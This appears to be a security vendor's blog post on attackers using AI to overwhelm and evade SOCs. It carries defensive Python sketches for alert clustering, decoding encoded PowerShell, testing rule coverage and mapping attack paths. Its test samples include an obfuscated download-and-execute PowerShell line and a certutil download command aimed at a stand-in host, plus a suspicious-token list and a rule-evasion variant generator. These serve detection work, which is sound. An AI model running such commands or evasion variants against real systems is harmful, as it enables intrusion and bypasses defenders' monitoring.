Are Attackers Already Using AI Against Your SOC?

Forget breaches. Think misdirection.

Threat actors will happily break in and exfiltrate, but more recently, these bed bugs have begun to infiltrate and linger, burrowing deep into the seams of your SOC operations. Attackers are leveraging AI to speed up their evolution from smash-and-grab petty thieves to long-term occupation forces, using your defenses against you.

I don’t think we are at AI-driven zero-days or autonomous malware swarms (yet). But from what we can see, attackers are already using AI as a force multiplier for stealth, deception, and SOC manipulation.

The Era of AI-Driven Misdirection

Most of the SOC teams we speak with are becoming overwhelmed by the volume of noise, including detections, false positives, and constant tuning requests. The bad guys know this (how could they not, as it’s what all of us vendors talk about), and they’re using AI to increase that volume in sophisticated ways.

Threat actors are using AI to flood your SOC with noise at scale:

- Dozens of unique phishing emails tailored to each persona in your org (scraped via LinkedIn, public content, and paste sites)

- Innocuous-looking payloads that trigger detection rules but mimic false positives (e.g., mismatched domains or typosquatting with whitelisted services)

- Variations of benign-but-suspicious behavior (e.g., idle RDP sessions, sleep timers, DNS tunneling decoys) designed to exhaust triage capacity

Now, your Tier 1s waste hours confirming false positives while the real intrusion attempt sneaks through.
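One way to blunt a noise flood is to triage clusters instead of individual alerts. The sketch below is a minimal illustration, not a product feature: the `Alert` fields, the 30-minute window, and the three-target threshold are all assumptions chosen for the example.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    # All field names are hypothetical; map them to your own alert schema.
    rule: str      # detection rule that fired
    source: str    # sending host or gateway
    target: str    # affected user or asset
    minute: int    # minutes since the start of the observation window


def cluster_alerts(alerts, window=30):
    """Group alerts that share a rule and fall in the same time window."""
    clusters = defaultdict(list)
    for alert in alerts:
        clusters[(alert.rule, alert.minute // window)].append(alert)
    return clusters


def flood_candidates(clusters, min_targets=3):
    """Keep clusters where one rule hit many distinct targets at once."""
    return {
        key: group
        for key, group in clusters.items()
        if len({a.target for a in group}) >= min_targets
    }


alerts = [
    Alert("typosquat-domain", "mail-gw", "alice", 2),
    Alert("typosquat-domain", "mail-gw", "bob", 5),
    Alert("typosquat-domain", "mail-gw", "carol", 9),
    Alert("idle-rdp-session", "ws-114", "dave", 12),
    Alert("typosquat-domain", "mail-gw", "erin", 47),
]

clusters = cluster_alerts(alerts)
floods = flood_candidates(clusters)
for (rule, bucket), group in floods.items():
    print(f"{rule} (window {bucket}): {len(group)} alerts, review as one case")
```

Handing Tier 1 a single case for the cluster, rather than three separate tickets, frees time for the alerts that do not fit a flood pattern.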



LLM-Assisted Behavioral Spoofing

Now that the bad guys are inside, they use AI to analyze host and network telemetry, then adapt their behavior to blend in.

Polymorphic Payload Generation

Tools like WormGPT and open-source LLMs are being paired with:

- TTP adaptation libraries (e.g., MITRE ATT&CK chains)

- Obfuscation engines (ROT, Base64, Unicode, PowerShell mangling)

- Contextual log spoofers (e.g., mimicking real Kerberos ticket patterns or file naming conventions)

Payloads now mutate on each execution and appear functionally legitimate, bypassing static detection models.
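Static matching struggles when the same script shows up Base64-wrapped or mangled, so a common defensive step is to decode and normalize before matching. The sketch below assumes the payload arrives as a PowerShell `-EncodedCommand` argument (Base64 over UTF-16LE); the token list, the simplified regex, and the helper names are hypothetical and stand in for real detection content.

```python
import base64
import re

# Hypothetical indicator list, for illustration only.
SUSPICIOUS_TOKENS = ("downloadstring", "invoke-expression", "frombase64string")

# Simplified: matches -e, -ec, -en..., -enc, -EncodedCommand followed by Base64.
ENCODED_ARG = re.compile(r"-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the decoded script from an encoded-command argument, or None."""
    match = ENCODED_ARG.search(command_line)
    if match is None:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except ValueError:  # covers invalid Base64 and invalid UTF-16
        return None


def normalize(script):
    """Drop backtick and caret escapes, collapse whitespace, lowercase."""
    script = script.replace("`", "").replace("^", "")
    return re.sub(r"\s+", " ", script).lower()


def matched_tokens(command_line):
    """Match indicators against the decoded, normalized form of the command."""
    decoded = decode_encoded_command(command_line) or command_line
    normalized = normalize(decoded)
    return [token for token in SUSPICIOUS_TOKENS if token in normalized]


# Build a test sample the way an encoded command line is constructed.
script = "Inv`oke-Expr`ession (New-Object Net.WebClient).DownLoadString('http://example.invalid/a')"
encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
command_line = f"powershell.exe -NoProfile -enc {encoded}"

print(matched_tokens(command_line))
```

A single decode-and-normalize pass will not keep up with every mutation, which is why it belongs next to behavioral detection rather than in place of it.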

Adversarial Alert Engineering

Attackers are now treating your detection stack as a puzzle to reverse-engineer.

How?

- Querying known SIEM rule logic (if leaked or observed via tuning behavior)

- Feeding log data into fine-tuned LLMs to identify correlation gaps

- Using automated chains to test payloads against open-source detection rules (Sigma, YARA, etc.) before deployment

They identify the gaps. Then:

- Generate noise that fills those gaps to obfuscate their real movements

- Time their operations to known low-visibility hours and escalate permissions slowly

- Use deception logic (e.g., host-based anomaly triggers with no real activity) to create distractions
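If attackers test against your rules before they deploy, it makes sense to run the same test yourself first. The sketch below is a toy version of that idea: the regex in `RULES` is a simplified, hypothetical stand-in for a real Sigma or YARA rule, and `variants` lists a few rewrites a tester might try. Whether a given rewrite still executes depends on the tool, so treat each gap as a lead to verify.

```python
import re

# Hypothetical, simplified stand-in for a detection rule.
RULES = {
    "certutil-download": re.compile(r"certutil(\.exe)?\s+-urlcache", re.IGNORECASE),
}


def variants(command_line):
    """Yield simple rewrites of a command line: flag style, spacing, casing."""
    yield command_line
    yield command_line.replace(" -", " /")
    yield command_line.replace(" ", "  ")
    yield command_line.upper()


def coverage_gaps(rule, samples):
    """Return every variant of every sample that the rule fails to match."""
    gaps = []
    for sample in samples:
        for variant in variants(sample):
            if not rule.search(variant):
                gaps.append(variant)
    return gaps


samples = ["certutil -urlcache -f http://example.invalid/a.txt out.txt"]
gaps = coverage_gaps(RULES["certutil-download"], samples)
for gap in gaps:
    print("not matched:", gap)
```

Here the rule tolerates extra spacing and case changes but misses the slash-style flags, which is exactly the kind of gap worth finding before someone else does.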

AI-Driven Internal Recon

Attackers are using AI not only to hide from you but also to navigate your environment. Once lateral movement is needed, they feed collected data into their AI:

- Extract IAM policy documents, GPO settings, vulnerability scan reports, and user activity logs

- Use LLMs to suggest attack paths based on misconfigurations, overly permissive roles, or unpatched systems

- Prioritize the most silent and least defended pivots
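Defenders can run the same kind of path-finding before an attacker does. The sketch below uses a breadth-first search over a small, entirely hypothetical environment graph; the host names, weaknesses, and function names are invented for illustration, and a real model would be built from your own IAM, GPO, and scan data.

```python
from collections import deque

# Hypothetical graph: an edge means "a foothold on A can reach B",
# labeled with the weakness that makes the hop possible.
EDGES = {
    "workstation-17": [("file-server", "shared local admin password")],
    "file-server": [
        ("ci-runner", "overly permissive service role"),
        ("backup-host", "unpatched SMB service"),
    ],
    "ci-runner": [("prod-db", "long-lived deploy credential")],
    "backup-host": [],
    "prod-db": [],
}


def shortest_attack_path(edges, start, target):
    """Breadth-first search for the fewest-hop path from start to target."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        node = path[-1]
        if node == target:
            return path
        for neighbor, _weakness in edges.get(node, []):
            if neighbor not in seen:
                seen.add(neighbor)
                queue.append(path + [neighbor])
    return None


def weaknesses_on(edges, path):
    """List the weakness behind each hop of a path."""
    return [
        next(w for n, w in edges[a] if n == b)
        for a, b in zip(path, path[1:])
    ]


path = shortest_attack_path(EDGES, "workstation-17", "prod-db")
hops = weaknesses_on(EDGES, path)
for (a, b), weakness in zip(zip(path, path[1:]), hops):
    print(f"{a} -> {b}: {weakness}")
```

Each weakness on the shortest path is a candidate fix that cuts the route to the target, which is a more useful priority list than raw vulnerability counts.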

What Makes This Dangerous?

It happens quickly. LLMs can simulate adversary logic at scale, suggesting in minutes the same movement chains a red team would take hours to brainstorm.

What This Means for Defenders

By now you know the SOC isn’t just a detection engine anymore. It’s a battlefield for cognitive manipulation.

Now you start to plan:





- Shift from alert validation to threat validation: Translate risk into threats, and focus on exposures that are both reachable and defensible

- Model adversary behavior within your environment using digital twins and attack simulations

- Build closed-loop feedback between telemetry, simulation, and automated response

We’re getting to a point where the adversaries might know your stack better than you do, and your SOC becomes a liability.

AI + SOC = ???

What we are starting to see is that threat actors aren’t breaking your SOC. They’re mimicking it, manipulating it, and maneuvering within it.

The next era of defense is AI versus AI. And you and your team will have to lead the charge. Modern defense isn’t about reacting faster anymore; it’s about not having to react at all.

Your move.